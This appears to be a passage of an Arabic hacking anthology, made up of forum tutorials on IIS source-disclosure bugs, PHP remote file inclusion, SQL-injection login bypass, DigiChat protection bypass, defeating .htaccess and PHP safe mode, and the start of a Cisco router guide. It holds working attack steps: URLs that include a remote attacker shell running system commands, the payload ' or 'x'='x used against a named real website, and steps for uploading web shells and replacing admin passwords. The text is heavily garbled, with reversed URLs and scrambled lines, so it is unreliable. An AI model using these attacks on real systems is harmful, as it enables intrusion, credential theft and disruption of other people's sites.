sam/repair/nt...samples/msadc/com.victim.www://http._ باستخدام االداة .. Expand it & Crack itبعد الحصول على ملف السام

) . ساعه 24سیتم كسرھا في اقل من (03LC.المفضلة لدي

329

-- -- --- -- -- ---

htw.Null : - -- --- -- -- ---

لذا سأكتفي فقط بطريقة .. لیة شرح كیفیة عمل ھذه الثغرة معقد قلیال عم ..االستفادة منھا

..ASPباختصار تسمح لك برؤية السورس كود الي ملف full=HiliteType...CiWe?twh.null/com.victim.www://http: لتنفیذ الثغرة

.asp.Defaultسیعرض لك ھذا الرابط السورس كود الخاص بالصفحه

- -- --- -- -- -- --- -- -- --- dll.webhits & .htw : -

- -- --- -- -- -- --- -- -- --- : اوال قم بتجربة اللنك على النظام الھدف

htw.blabla/com.victim.www://http فھذا STRING is invalid_format of the QUERY: فإذا كان الرد بھذه العبارة

% .90يعني ان النظام الھدف مصاب بنسبة :اخیرا جرب تنفیذ الثغرة بھذه الطريقة

full=hilitetype...x/xxxxxxxx/xxxxxxxxx/com.victim.www وبالتأكید , باحد ھذه الملحقات htw.XXX/XXXX/XXXXX/XXXXXمع تغییر الـ

:سیعمل احدھا htw.qfullhit/oop/issamples/iissamples htw.qsumrhit/oop/issamples/iissamples htw.lhitqful/search/exair/isssamples htw.qsumrhit/search/exair/isssamples

..3LCوبالتالي ستحصل على ملف السام قم بكسره بواسطه االداة

-- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- ]ASP DATA$[::Alternate Data Streams : -

-- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- وھي مخصصة بالتحديد لسیرفرات .. 1998ة كانت بدايتھا منذ العام ھذه الثغر

.03IIS 04. واالن تعمل على بعض سیرفراتIIS..

330

البعض يتساءل مالفائدة من عرض (( ومھمتھا عرض السورس كود الي صفحه االجابة ان بعض الصفحات تحتوي على معلومات مھمة )) سورس الصفحه ؟؟

asa.Globalبیانات مثل مثل كلمات مرور قواعد اليمكن تنفیذ الثغرة من المتصفح بواسطة ھذا األمر

asp.default/com.victim.www://http::$DATA

-- -- -- -- --- -- -- --- ASP dot bug : -

-- -- -- -- --- -- -- --- ھي ھذه الثغرة حیث تقوم ايضا بعرض السورس ربما اقدم ثغرة في ھذا النص

..1997حیث تم اكتشافھا في العام .. كود الخاص بأي صفحه :ويتم تنفیذھا من المتصفح بھذا الشكل

.asp.sample/com.victim.www://httpلسطر الحظ النقطة الموجودة في اخر ا .03IIS.وھي فقط تعمل على سیرفرات

- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- <DLL Buffer.ISM Truncation : -

- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- ..خطأ برمجي يسمح للمھاجم بسحب الملفات ورؤوية السورس كود ايضا >

وفي .. ننا قمنا يطلب ملف ما وفكرة الثغرة ھي التحايل على السیرفر بإيھامه ا ..الحقیقة نحن نقوم بطلب ملف اخر

حیث يتم تحمیله بعدد كبیر من dll.ISMالملف المسؤوول عن ھذا الخطأ ھو .Space ) 20(%الرموز المسافة

:يمكن تنفیذ الثغرة بھذا الشكل asa.global/com.victim.www://http...)>=230(htr.asa.global

% ..20 مسافة بھذا الشكل 230نقوم بوضع > =230مكان الـ ولكن ال يمكن تجربتھا على .. 04IIS &5.0.ھذا الخطأ يعمل على سیرفرات

ويعود السبب , السیرفر اكثر من مره اال اذا قام بتسجیل خروج وتسجیل دخول عن العمل في dll.ISMة السابقة تؤدي الى ايقاف الملف في ذلك ان الثغر

لذا يجب اعادة .. الذاكرة بینما تطلب الثغرة ان يكون الملف المذكور قید العمل اي بمعنى اخر يجب ان يقوم مدير .. تحمیل الملف في الذاكرة مره اخرى

.Logout & Login او Rebotالنظام الھدف بعمل اعادة تشغیل

331

- -- ------ - .+htr: -

-- -- -- --- .ASPھذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات

:يمكن استخدامھا بھذا الشكل htr+.asa.global/com.victim.www://http

- -- --- -- -- ---

csc.site : - -- --- -- -- --- الخاص بالموقع بما DNSذه الثغرة من معرفة معلومات مھمة عن الـ تمكنك ھ ..UID and PASS Database, DSNفي ذلك

csc.site/config/adsamples/com.victim.www://http: الثغرة وسیحصل على معلومات قیمة و ھامة .. ف المذكور سیقوم المھاجم بانزال المل

.أيضا

332

المشھوره مع نموذج عملي php شرح لثغرات ال

x911 fady:للكاتب

اھال بیكم في اول مواضیع امن الشبكات في منتدي القھوه و يفیدكم و اتمني ان الموضوع يعجبكم

سوف اقوم الیوم بشرح بعض ثغرات ال

php عملي المنتشره مع نموذج

لكن قبل ان ابدا الشرح احب ان اوضح اني ال احب ان اعطي المعلومه بالملعقه فاذا

احبب ان تصبح ھاكر حقیقي يجب ان تبدا بالبحث بنفسك عن المعلومه و ان تقوم

بتطوير نفسك و تعلم البرمجه و انظمه التشغیل المختلفه

لغه برمجه الالشرح يجب ان تكون عندك معرفه بسیطه ب حتي تفھم ھذاphp

المبنیه علي الیونكس مثل اللینكس وال و انظمه التشغیلfree bsd

open bsd ....

االن لنبدا الشرح و

اغلب ثغرات الphp

مبنیه علي اخطاء المبرمج ايضا اخطاء مدير السیرفر و

و سنستعرض نماذج لكال منھم

رحمدير السیرفر النھا االسھل في الش و لنبدا باخطاء

333

بتشغیل ال تنحصر اغلب اخطاء مدير السیرفر بان يقوم

php بنفس ال

id الخاص بال

apache يكون و الذي غالبا ما

99 و اسم المستخدم

nobody ال و ھذا المستخدم له كل صالحیات

arache web server فله الحق في قراءه كل ملفات المواقع االخري

ت المسموح له من قبل المستخدمین االحیان تعديل بعض الملفا و في بعض بتعديلھا االخرين

سؤال بديھي للغايه المستخدم؟؟ كیف نقوم بالتحكم في ھذا

باالضافه الي ببساطه يمكنك ھذا بناءا علي خطا اخر يقوم به میدر السیرفر

الخطا االول و ھو عدم تشغیل ال

php في وضعیه ال

safe mode ملحوظه يمكنك تعديل خصائص ال

hpp ملف من

conf.php مثل فبالتالي نصبح قادرين علي استخدام اوامر

()system ()exec

و ھذا يقوم باعطاءك ما يطلق علیه

334

php shell

مشاھده الذي عن طريقھا تستطیع ان تقوم باصدار االوامر التي تجعلك قادرا ملفات المواقع االخري و احیانا

المستخدم غباءالكتابه فیھا لكن ذلك يكون ناتجا عن

ملحوظه ھذا ال يعتبر في حد ذاته خطا اذا كان الphp ب يعمل

id المستخدم

و لیس الخاص بالapache

الخطر ممیت بالنسبه للسمتخدم و ضعیف و لكن في تلك الحاله سیصبح للغايه بالنسبه

السیرفر لمدير من االخطاء االخري الشائعه جدا اال و ھي ال

sglobal variable

التي تسمح مثال ان تجعل االتي ممكنا:PHP

;"txt.script/attacker://p++h="var$

ملف و تلك يجب اغالقھا من

conf.php "off="global variables

المبرمجین و سنعرف فائدتھا في قسم اخطاءيوجد به خطا من اكبر اخطاء المبرمجین اعتقاده ان الكود الذي كتبه كامل وال

احد و سوف يعمل كما توقع ھوو

335

ملف و كمثال بسیط لو افتراضا ان ھناك

php.script الكود الخاص به كاالتي

:PHP

<?

----------- ;)file$(include

-----------

?>

المتغیر كما تالحظون فان المبرمج تركfile$

غیر معرف و لیه له قیمه محدده االتي لذلك يمكنك فعل

txt.shell/attacker://p++h=file?php.script/host://p++h

حدث ھنا اننا جعلنا ال الذيphp.script

موقعنا تقوم بتشغیل الكود الموجود بداخلtxt.shell/attacker://p++h

بھذا و الذي من الممكن ان نضع به شیئا شبیھا:PHP

336

<? ;)x$(system

?>

بالتالي و al-ls =x&txt.shell/attacker://p++h=file?php.riptsc/host://p++h

سوف يقوم باستعراض كل الملفات الموجوده بالموقع

االتي الحظوا معي ھذا ال يمكن فعله اال في حاله

on= safe mode on= global variables

يمكنك ان تضع اي كود اخر فيtxt.shell

السیف مود يعمل خصوصا في حاله اذا كان مثال

:PHP

;()phpinfo

337

الخاصه بالسیرفر سوف تقوم باستعراض كل المعلومات

الحظ ھنا ان

:PHP

;"txt.shell/attacker://p++h="file$

التي تحدثت عنھا مسبقا و ھذا ناتج عن الجلوبال فاريابلز و كما تري ھنا فان فائدتھا واضحه جدا

جب ان تقوم باغالق تلك الخاصیهمدير لسیرفر ما ي فاذا كنت

العملي و االن وقت النموذج

سوف اقوم االن بشرح ثغره جمیله قام باكتشافھاfrog man

الثغره موجوده بمنتديات و تلك

forum-D

ملفي ھذه الثغره موجوده فيphp.header php.footer

php.header

:PHP

338

<?

-------------

"")!=header _my$(if { ;)header_my$(include }

-------------

?>

php.footer

:PHP

<?

-------------

!="")footer _my$(if

{ ;)footer_my$(include

339

}

-------------

?>

جدا من الثغرتان واضح وبسیط و طبعا فان طريقه تشغیل كال

php.header .script/attacker://p++h=header_my?php.aderhe/includes/host://p++h

txt ل نفس الشيء و

php.footer tx.script/attacker://p++h=footer_my?php.footer/includes/host://p++ht

ان يكون شرحي افادكم و اعجبكم اتمني تحیاتي

340

شرح ثغرة سجل الزوارللجمیع

eB7MeSa :للكاتب


aspjar guestbook ..الیوم بشرح لكم ثغرة سجل الزوار

.. سھله جدا+ ثغرة جديدة

sql injection ..ھي من نوع

: الشرح

: اذھب الى قوقل وضع ھذي الكلمة في محرك البحث

PHP :كودaspjar guestbook

: لك مواثع كثیرة ناخذ ھذا مثال بتطلع

asp.guest/Guestbook/com.timberman.www://http

: كلمة قم بمسح

PHP :كودguest.asp

: بـ واستبدلھا

341

PHP :كودadmin/login.asp

: خال اسم المستخدم والباسورد وھماقم باد االن

: اسم المستخدم

(nothing)

: الباسورد

' or 'x'='x

Log in اضغط االن

: راح تلقى ھالكالم ومعناه تم تسجیل دخولك بنجاح

342

Login Page You are Logged in!

Choose from the menu at the top to maintain the site

: االن قم بمسح كلمة

login.asp?Mode=login

: الرابط ھكذا لیكون

http://www.timberman.com/Guestbook/admin/

.. سترى لوحة التحكم االن

344

اختراق الديجي شات احدث الطرق لتخطى الحماية

CrystaL-rSupe :للكاتب

للدرسین التى فاتت عن اختراق درسنا الیوم جديد من نوعه وھو تكملة

الديجي شات قبل كم سنوات

عن اختراق الديجي شات ولكن لم اطرح الدرس اال بعد ماقمت درسنا عباره بعمل مضاد لكل ماسأشرحه

ھنابانه التع ولكن لتسويق عملنا شرحنا اختراق الديجي شات وتخطى الحماية

بالمواقع

اذن سنبدأ بالدرس واالبتعاد عن المقدمات وكالم طويل عريض

لدي شرط عزيزي القارئ واتمنى ان تحترم كاتب الموضوع والتتغاضى عن ولكن شروطي

وھذا من حقي

مااكتب شرح باالخص اتمنى حفظ حقوق الكاتب واليتم سرقة فأنا الحظت كل

عن الديجي شات

اي مصدر لكل ماتعبت علیه رض بعدة مواقع وبكتب ولم يذكريتم سرقه وع وكتبته

علیه والحقوق تحفظ لي او فھذا الدرس طرح بمنتدى العاصفة وتم التوقیع

لمنتدى العاصفة اھم شئ تحفظ

مطالب واليضیع حق ورائه

345

::::::::::::: (ابوروانCrystaL - Super)الكـــاتــب ::::::

حماية كتبتة سابقا وسأشرح فقط على المواقع التى تضعلن اعید على شرح على دردشتة

مثل سكريبت اللغة الذي به العديد من المزايا

سنبدأ بالطرد التلقائي في اغلب الدردشة التى تضع السكريبت خارج اوال

الدردشة

كیف لي ان اعمل فلود واليتم طردي او اخفاء ماكتبتة من فلود ؟؟؟ اذن

فعله ھو التوجه الى صفحة الديجي شات اغلبھا تكون بالصفحة اعلیككل م الموقع الرئیسیه تبع

قم بعرض المصدر تبع الصفحة الخاصه بالموقع مثال

السطر ابحث عن ھذا

<PARAM NAME="floodControl" VALUE="2500">

FloodControl ولكن اھم شئ ھو2500ان يكون اليھم

طر قم بحذفهبعد ماتحصل على الس

مالحظة التكون غبي وتحفظ كود المصدر

وتابع معى الشرح

تخطینا اول عائق وھو الطرد التلقائي االن

ماذا بقى لنا

السطر بدل السطر الذي حذفته قبل لحظات قم بأضافه ھذا

346

<PARAM NAME='BuddiesTab' value='True'>

اسھل شئ ومتوفر في انظمة html الكود واذھب الى اي محرر اكواد انسخ

تستخدمھا ھو ويندوز اذا كنت

الفرونت بیج

للكود بعد ماحذفت كود الفلود وانسخ الكود كله تبع الموقع ومعه اضافتك

شات وبدون مايتم طردنا وكأننا االن تخطینا الفلود ونستطیع عمل فلود بالديجي مستخدمین خاصین

ذه الطريقه التى اليستطیعون عملھا بسبب ھ اما بقیه الزوار سینبھرون من

الطرد التلقائي الموجود بصفحة الموقع

وعلى كل زائر التقید بعدم الفلود وال تم طرده ولكن من يتبع انجازات سوبر كريستال العلیه

اال ان يعمل مايشاء

اضفناه؟ اذن ماھو الكود الثاني الذي

المراقب المخفيھو كود الستخراج قائمة االصدقاء وكشف

الحظ الكود تبع قائمة االصدقاء ولكن

<PARAM NAME='BuddiesTab' value='True'>

ھكذا واذا لم ينجح ضعه ھكذا ضعه

<PARAM NAME='BuddiesTab' value='FALSE'>

مبروك علیك تخطیت عائقین بالديجي شات واالن

347

ولكن يوجد مشكلة آخرى ؟؟

ل لفظ الجاللة وھذا ماشرحته بدرسي السابق عدم الدخول بأسم يحم ھي

سأعید شرحه ھنا قبل سنتین تقريبا ولكن

قم بفتح المصدر بعد التعديل علیه

السطر والبحث عن ھذا

البداية

str=loginname;

بمسحة الى ان تصل الى وقم

var drawmenu;

قم بمسحة وايضا

تواآلن مبروك علیك تخطیت ثالث خطوا

التلقائي وھي الطرد

اضافه قائمة اصدقاء لكشف السوبر المخفي

اسم يحمل لفظ جاللة مسح سكريبت منع دخول

348

طیب بقى لنا كم من خطوة ولكن لن أشرحھا ھنا

االصدقاء باالنترنت وقم بضافتة تحت كود قائمة Bannd ابحث بنفسك عن كود

قبینكي تدخل ومعك صالحیة طرد الزوار والمرا

ان يقومويوجد طريقه قمت ايضا بكشفھا وھي كیف تدخل وتمنع اي شخص بحضرك

ولكن لن اشرحھا النني اعتبرھا من الطرق الفضولیة على الزوار

يدعونھا اذن اآلن انتھینا تقريبا من بعض طرق تخطى سكريبتات الحماية التى خبراء آمن الديجي شات

ولم يتقبى من درسنا اال خطوة واحده

ة اخرى واتبع وھي لماذا اراجع درسك ياسوبر كل مااريد ان ادخل دردش

والتعب الخطوات

دردشة يوجد طريقة تريحك من التعب اذا اردت ان تطبق جمیع الطرق على أي ديجي شات تريد

طبعا بعد ماقمنا بالتعديل نحفظ الصفحة بالجھاز

وكل مره نريد ندخل الشات المحدد ندخل عن طريق ھذا الصفحة

نااردنا الدخول لشات آخر كل ماعلی ولكن اذا

ھو فتح سورس الصفحة

349

والبحث عن

"<APPLET CODEBASE=http://127.0.0.1/DigiChat/DigiClasses/"+"\n"+

ذالك نذھب لديجي شات الذي نريد ازعاجة ھذه المره بعد

شات نفسه ولیس سورس صفحتك التى عملتھا ونفتح ايضاء سورس الديجي

االي بيرقم ونبحث عن نفس السطر وبعد ذالك نأخذ

ونذھب لصفحتنا ونضعھا بدل رقم االي بي تبع الدردشة القديمة

وانتھت

وانصحك ان تعمل كالسوبر كريستال في السابق

اجرامیة وبھا كل مااريد html صفحة مبرمج لي

االي بي وكل مااريد الدخول لشات فقط اغیر رقم

فلود قل علیك وانت تعملطبعا احذف الصور الموجودة بسورس الصفحة كي التث

---------------------------------------------------------------------- =___________________________________________=

---------------------------------------------------------------------

وارطريقة اخرى وھي الـطـرد الجماعي للز يوجد

350

جسیمة للديجي شات ولكن لن اشرحھا لما تسببه من اضرار

ولكن سأعطیك زبدة الموضوع

Rانه صمول ولیس كبتل وتأكد r قم بتشفیر حرف

والتنقص ثالث نجمات فقط التزيد(( *** )) قم بتشفیره بمقیاس

سترى انك تنطرد انت وجمیع الزوار rواذھب للديجي شات وضع حرف الـ راقبین بمجردوالم

وضعه بالديجي شات

؟ ستقول لي كیف اشفره

الجواب عندك استعن بخبراتك بالجافا سكريبت وحاول

ماتشفره وبعد

ضعه بالسطر الثالث من

"<META NAME='Audience' CONTENT='All'>"+

السطر ھذا او بعد سطرين من ھذا السطر بعد

عب بهواحفظه وادخل الشات وسترى كیف تل

------------------------------------------------------------------------

طريقة جمیلة جدا ومضحكة بنفس الوقت ھي لیست اختراق وفلود يوجد وعمل زحمة

351

اضافة جديدة تمیز نفسك ولكن

ھھھھھھھه مثال كیف ادخل شات واسمي بالعبريه مثال او بالصینیة

خل تحصل العالم خاص عندك واالغلبیه من النوع الثانياشھد بعد ماتد

يھا ايام مراھقتي بالديجي شات لوولكنت اسو

اللغة الى تبیھا في ھذا السطر اضیف اختصار

"<META NAME='Language' CONTENT='EN/AR'>"+

ھذا فقط اذا اردت ان تدخل ويكون اسمك مختلف عنھم بلغة عجیبه طبعا

وغريبه

وھو عربي اجنبي خلیه عربي عبري لوولAR / ENاختصار اللغه بدل غیر

زيھا واذا تبي تكتب عندھم بالشات بطالسم واشیاء مايقدروا ان يكتبوا

نضیف ھذا السطر

"<META HTTP-EQUIV='Content-Language' CONTENT='ar-eg'>"+

الخ......ايضاء اختصار عربي وصیني او التیني نغیر

من التساؤالت طبعا كي اليكون شرحي به كثیر

سأوضح اين تضع ھذا االكواد

علیه سابقا نفتح السورس الذي اضفنا

352

ونبحث عن

drawmenu="<head>"+

تحته مباشره سطر لغة االسم وھو نضیف

"<META NAME='Language' CONTENT='EN/AR'>"+

اردنا إن نضیف كود الكتابة بوسط الديجي شات واذا

نبحث عن ھذا الكود

"<META HTTP-EQUIV='Content-Type' CONTENT='text/html; charset=windows-1256'>"+

كود الكتابة باللغة التى تريدتحته مباشر نضیف

"<META HTTP-EQUIV='Content-Language' CONTENT='ar-eg'>"+

فیه اكتشاف لي وخطیر جدا ببرنامج الديجي شات طبعا

بسیط حتى اليتم كشف الباقي ولكن لن اوضح منه حتى لو جزء

ولكن فقط اود ان اذكره

ت الكامل للديجي شاتاضیف اسطر في السكريب ھو اننى اسطعت ان

353

بل انشأت لي ملف وقمت بتعديل textبـ وبدل مايتم الكتابة بالديجي شات

الكود

بــ؟؟؟؟؟ الى ان سمح لي

امتداد التتوقعونه

!!!!!!!!!!!!!!!!! exe

شات على زوار الديجي% 100شئ اليصدق فعال وھذا ماسبب خطورة

... كشفھا مھماولكن اظن لن تخفي علي اي عبقري وسی

الديجي شات كالطفل بأبتسامتة البرئیة التى تملئ MG Chat طبعا برنامج برنامجھم وجه لم يقوم بحماية

مشاكل ولكن السبب لماذا لم يقوموا بحماية برنامجھم ھو انھم لم يواجھو اي

حول ھذه الطرق

الحماية الي يفتقر وسأقوم بمراسلتھم حول ھذه الغلطات الفادحة ببرنامجھم %20حتى وبنسبة

التى لم اضیف على البرنامج اال MG Security ولكن بعد مااقوم بتوزيع نسخه

سكريبتات بسیطة وقويه

تمنع جمیع المخاطر بأقل االسعار وفعالة بنفس الوقت

االخطاء وترفع سعر النسخه الننى اعلم ان شركة األم ستقوم بترقیع ھذا ق ارتفاع سعرهعائالجديده مما سیكون ال

354

شرح تخطي مجلد الحمايه لألدمن

Qptan :للكاتب

------------------

: مجلد الحمايه نبذه عنفـ غالبا تجده يعیق admincp ھو مجلد حمايه يوضع على مجلد األدمن

منتدىلل السكربت كیدز عن اإلختراق------------------

------------------

من الطرق الثالث لتخطي1في موضوعنا ھذا سوف أشرح لكم الطريقه رقم htaccess مجلد الحمايه األكسس ھتاكسز

------------------

------------------ command exection سوف اشرح لكم الطريقه وھي تكون عبر ثغرات

اللیل من قبل شبحvb 3لمنتديات command exection رهتم شرح ثغ ولقد------------------

------------------

: الطريقهموضوع شبح تم شرح ھذه الطريقه ضمن( على المنتدى phpshell أوال ارفع

)اللیل html_ cd publicاالن اذھب الى المجلد الرئیسي للموقع ھكذا

ls االن اكتب االمر htaccess االكسس لك ملفات الموقع ومن ضمنھا مجلدسوف يظھر

cd htaccess االن ادخل الیه ھكذا ls االن اضغط vb بیطلع لك

cd vb ادخل الیه ھكذا ls االن اضغط

admincp المنتدى ومن ضمنھم تجد الملفات المحمیه في مجلد

355

edit admincp االن اكتب األمر لتحكم بلمنتدىاالدمن كنترول ل األمر للتعديل مجلد

MyShell ان تستعمل الشیل يجب: مالحظه ھامه

المھم

des الیوزر والباسورد طبعا الباسورد مشفر بمقیاس سوف يظھر لك : يظھر ھكذا

Passwrd DES:admin إما انك تفك الشفره أو انك تغیر الباسورد المشفر الى: اآلن أمامك خیاران

انت بكیفك الحین, التشفیر باسورد مشفر آخر انت تعرفه ماقبل

للحفظ Save على بعد كذا اضغط

admincp/vb/com.XXX.www : اآلن اذھب الى مجلد المنتدى ھكذا بدلتھم بباسورد اخر تعرفه ماقبل التشفیر ادخل الباسورد والیوزر الي فكیتھم او

!! تخطینا االن مجلد الحمايهمبروك لقد

356

السیف مود ما ھو وكیفیفة تخطیه وكیفیة تفعیله على السیرفر

hacker_hi:للكاتب

أوال ابرئ ذمتي من اي استخدام خاطئ لھذا الموضوع

اكثر من انه موضوع تعلیم اختراق الن الموضوعین ثانیا الموضوع سیكیورتياالخر فحتى اشرح الحماية البد ان متالزمین وال يمكن تطبیق احدھما بدون

. اشرح االختراق و توضیح الخطر حتى يكتمل الموضوع

mode- safe ...ماذا نعني بكلمة الحالة اآلمنة أو الـمن استدعاء دوال النظام بمعنى آخر ھو php اسكربتات الـ ھي عبارة عن منع

popen )وexec _hell sو....و sytem ( )الدالة حجب لبعض الدوال الخطرة مثل Pass thru ( )وexec ( )و(

مفعلة حتى system ()يجب أن تكون دالة الـ cat حتى تستخدم األمر فمثالبشكل صحیح ومن غیرھا لن تجد أي استجابة من السیر تستطیع تطبیق األمر

... فر

ان السیرفر سیف مود ؟؟ phpshell نستخدم الـ كیف نعرف اذا كنااي استجابة لھذا االمر من السیرفر ال بقنا اي امر ولم يكن ھنالكنعرف اذا ط

وال رسالة خطأ No such File or dirctory رسالة خطأ في اسم او مكان الملف permmission denied ....في الصالحیات

No such file or dirctory الناتج بعد تطبیق االمر الرسالة ھذي اما اذا كانكتبته غیر صحیح وابحث عن مسار اخر للملف او ف اليفاعرف مسار المل

... المسار للملف الذي تبحث عنه لمعرفة find المجلد واستخدم االمرفاعرف بأنه permmission denaied وأما اذا كانت رسالة الخطأ في الصالحیات

لیس لديك الصالحیات في االمر الذي كتبته مثلshadow /etc/cat رسالة لیس لديك الصالحیةمباشرة سیعطیك ...

: -السیف مود على السیر فر طريقة تفعیل* ...ثالثة لن اتطرق لھا سأذكر أشھر طريقتین لتفعیل السیف مود وتوجد طريقة

السیف مود غیر وسنجد أن حالةini . php استعراض ملف- :الطريقة األولى - 1 off = mode _ safeمفعلة مسبقا

: -التالي ینا إال وضعولتفعیلھا فما عل2 (

357

on= mode –Safe ثم نقوم بعمل ريستارت لالباتشي باألمر

httpd restart الخاصیة طريقة حجب الدوال يدويا وذلك من خالل-: الطريقة الثانیة - 2

.... ini .phpالموجودة في الملف pico ثم بعد استعراض الملف بامر

ini.php/lib/local/usr/Pico = function_disableعننبحث

.... التي نريد حجبھا بعد عالمة المساواة بھذه الطريقة ونضع الدوالexec–shell, popen ; exec ; passthru; system= function _Disable

باألمر ثم نقوم بعمل ريستارت لالباتشيhttpd restart

: -طرق تخطي السیف مودفقط بمعنى php ط على سكربتات ودوالتطبق فق الجمیع يعلم أن السیف مود

للملفات األخرى يمكننا من خاللھا أن بإمكاننا استخدام دوال وسكربتات perl ....و pythone – استدعاء دوال النظام واالستفادة منھا ومن أشھرھا

cgi استخدام سكربتات بیرل و1 ( كربتات الـاالسكربتات المعروفة والتي تؤدي نفس عمل س وسأذكر ھنا أخطر

php االسكربتات المستخدمة اسكر بت بل وبشكل أرقى ومن أشھر cgitelnet ....

الخ cgicommander ...واسكربت cgitelnet zip.cgitelnet/downloads/org.corruptcode://http لتحمیل الـ

cgicommand تحمیل الـلzip.cgicommand/downloads/org.corruptcode://http Homo Commander المشھورة ويوجد افضل منھا بكثیر مثل ھذه

لكي تعمل ھذه االسكربتات بشكل صحیح والیكم بعض االساسیات

البیرل أوال يجب أن يدعم السیرفر السي جي أي أو طبعا في بداية االسكربت يجب تحديد مسار البیرل كي يعمل االسكربت بشكل

صحیح وھذان ھما المساران االفتراضیان للبیرل اماperl /bin/usr/او perl/bin/local/usr/

html _ publicاقصد واحیانا تعمل سكربتات البیرل على جمیع مجلدات السیرفر

358

مجلد واحیانا ال تعمل اال داخل مجلد السي جي اي بن لذلك ضح املف داخل .. bin -cgiالسي جي اي

$ WinNT =0 ;ان كان النظام لینكس فال نعدل شئ في/ ثانیا

بواحد فنستبدل الصفر2000او احد مشتقاته كويندوز NT أما إن كان ويندوز بحیث يكون

= WinNT $1 Password "**********" =;نضع باسوورد على االسكربت من / ثالثا

changeme بدل النجم نضع كلمة الباسورد والكلمة االفتراضیة الطريقة الثانیة لتخطي السیف مودسیف مود فاننا نحاول استخدام الشل او عند اختراق أي موقع وكان السیرفر

عن طريق ssh تصال بالشلاال التلنت ان كان مفعل للموقع وقد عرفنا كیفیةبرامج االتصال في وذكرنا امثلة على23 والتلنت عن طريق المنفذ 22المنفذ

الدرس الثاني

الطريقة الثالثة لتخطي السیف مودكثیرا في اختراق المنتديات الموجودة على السیرفر وھي استخدام وتفید

ألباتشي اوويكون موجود مع نسخة سیرفر ا phpmyadmin سكربتات مثلphp .sqlاوphp . mysqlسكربتات كثیرة للتحكم بالداتا بیس على ويوجد

السیرفر حتى مع تفعیل السیف مود

ولتعطیل البیرل والسي جي اي من السیرفر اما يتوقیفھا نھائیاperl/bin/usr /744Chmod perl/bin/local/usr /744Chmod

conf . httpdواقع من االباتشيجي اي للم والحل االفضل بتوقیف السي

/ conf/apache/local/usr/وتجده على المسار واذھب الى ھذا السطر

/bin-cgi/html_public/XXXXXX/home/ /bin-cgi/ScriptAlias واحفظ التعديالت Home احذف

x + ctrl y

انتھى وھذا الحل افضل برايي

359

... السیرفر على SuExec وال تنسى تفعیل

nobody كي يمنع تشغیل االوامر الي سكربت في وضعل

360

Exploiting Cisco Systems

FunnY^Dr: للكاتب

عن الراوترات Hacking Networks Routers تكلمت في موضوع سابق بعنوان. ووظیفتھا على االنترنت ومقدمة بسیطة للتعامل معھا ا في الشبكاتواھمیتھ

وبتفصیل اكبر في احد ھذه االنواع من الراوترات وھو والیوم سنقوم بالتوغل اكثر Cisco Routers واكثرھا استخداما وھي من نوع اكثرھا شھرة على االنترنت

Cisco عالمھانروح رحلة الى فتح عینك وشغل راسك واقعد كويس علشان... Systems ومتنساش تربط الحزام

ھذا cisco systems ,ال تقوم باستغالل ھذه المعلومات في تخريب: تحذير . فقط استعمل المعلومات في الطريق السلیم , الموضوع لغرض تعلیمي فقط

تعلم انه بتخريبك لراوترات سیسكو او حتى مجرد تعطیلھا يمكنه ان ويجب انلمئات من مستخدمین االنترنت وخسائر باالف الدوالرات يتسبب في مشاكل

عنھا مما يوقعك في مشاكل انت في غنى

------------------------------------- : المحتويات

------------------------------------- : في البداية وقبل ان نبدء

IP ما ھو عنوان- ISP ما ھو الـ- IP packet/ TCPماذا تعني- IP للـ spoof كیف اقوم بعمل- Telnet كیف اقوم باستخدام- rminal HyperTeكیف استخدم- Ping كیف استفید من-

361

TraceRoute كیف استخدم- proxy server كیف استعمل-

---------------------------------------- cisco router بأختراق لماذا اقوم: الفصل االول - cisco router كیف اعثر على: الفصل الثاني - والدخول الیه router ciscoكیف اقوم بكسر: الفصل الثالث - cisco router كیف اقوم بكسر الباسوردات لـ : الفصل الرابع-

---------------------------------------

: معرفتھا قبل البداية اساسیات يجب علیك

--------------------------------------- IP :ھو عنوان ما-

IP ھو اختصار لـ , Internet Protocol شبكة االنترنت وكل جھاز او سیرفر علىمن وال يمكن بأي حال, يمتلك اي بي اما يكون ثابت او دينامیكي اي متغیر

واجھزة الكمبیوتر تتعرف على بعضھا عن طريق IP ,االحوال ان يتشابه رقمان . الخاصة بھا كما يتعرف البشر على بعضھم عن طريق اسمائھم IP ارقام

ارقام االي بي الخاصة بك عن طريق الكثیر من الطرق ىويسھل الحصول عل : فیمكن مثال,,,, واالدوات

تدخل على احد المواقع فیقوم الموقع بتخزين االي بي الخاص بك في ملفات - log الـ IRC يستطیع اي احد الحصول على االي بي الخاص بك عن طريق الـ- الي بي الخاص بك حتى لو يستطیع اي احد الحصول على ا ICQ وكذلك على-

فبأمكانھم ايضا الحصول علیه" do not show ip "كنت قد اختارت خاصیةورؤية " systat "فبأمكانه كتابة اذا قمت باالتصال بأي شخص على االنترنت-

رقم اي بي المتصل معه

362

وبكده يقدر يحصل logging java - IPيحتوي على ممكن يا حد يبعتلك ايمیل- ي الخاص بكعلى االي ب

الخاص بك ومن ضمنھا برامج IP كثیرة للحصول على رقم وتوجد طرق اخرى NetBus .اوSub 7التروجن مثل

---------------------------------------------

ISP :ما ھو الـ-

ISP ھو اختصار لجملة Internet Service Provider وھو ده اللي بیوصلك up - dial ,,,بتدخل على االنترنت عن طريقه بواسطةاالنترنت او اللي انت

على االي traceroute بتاعك عن طريق عمل ISP االخرين ان يعرفو الـ وبأمكان : ستخرج نتائج مشابھة للنتیجة التالیة حیث.. بي بتاعك

222.222.22.22tracert

]221.223.24.54[Tracing route to . hops30over a maximum of ]222.222.22.21[isp .ms your132ms 122ms 147 1 ]222.222.22.20[firewall .ms isp123ms 143ms 122 2 ]207.22.44.33[com .ms aol122MS 142ms 156 3

Request timed out * * * 4 ]194.33.44.33[router .ms cisco133ms 102ms 101 5 ].11.11.11111[ip .ms something102ms 143ms 6 233 ]122.11.21.21[com .ms netcom213ms 123ms 222 7 ]121.21.21.33[net .tts.ms blahblah212ms 211ms 152 8 s 'target<<< ] 121.22.32.43[com .34.ms altavista243ms 223ms 122 9

isp com .34.altavista.221.223.24.54ms 132ms 122ms 101 10

] 221.223.24.54[ .Trace complete

-----------------------------------

363

IP packet / TCP:ماذا تعني-

IP /TCPھو اختصار لـ Transmission Control Protocol و.. Internet Protocol والحزمة دي, عبارة عن حزمة من المعلومات المضغوطة IP packet / TCPوالـ

